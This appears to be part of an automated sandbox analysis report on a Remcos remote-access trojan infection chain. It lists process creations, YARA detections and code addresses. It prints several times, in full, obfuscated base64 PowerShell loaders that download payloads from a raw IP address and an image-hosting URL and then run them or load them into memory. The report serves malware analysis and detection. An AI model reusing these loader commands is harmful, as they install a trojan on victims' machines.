                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleateJump to behavior
                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 8.2.powershell.exe.90965d0.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000008.00000002.2521285929.0000000009096000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: CasPol.exe PID: 6284, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleate
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleateJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_004158B9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_042487B08_2_042487B0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04247FF48_2_04247FF4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004520E212_2_004520E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041D08112_2_0041D081
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043D0A812_2_0043D0A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043716012_2_00437160
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004361BA12_2_004361BA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0042626412_2_00426264
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043138712_2_00431387
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041E5EF12_2_0041E5EF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044C74912_2_0044C749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004267DB12_2_004267DB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043C9ED12_2_0043C9ED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00432A5912_2_00432A59
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043CC1C12_2_0043CC1C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00434D3212_2_00434D32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043CE4B12_2_0043CE4B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00440E3012_2_00440E30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00426E8312_2_00426E83
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00412F4512_2_00412F45
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00452F1012_2_00452F10
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00426FBD12_2_00426FBD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00401F66 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004020E7 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004338B5 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00433FC0 appears 55 times
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2055
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 2022
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2055Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: Commandline size = 2022Jump to behavior
                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 8.2.powershell.exe.90965d0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
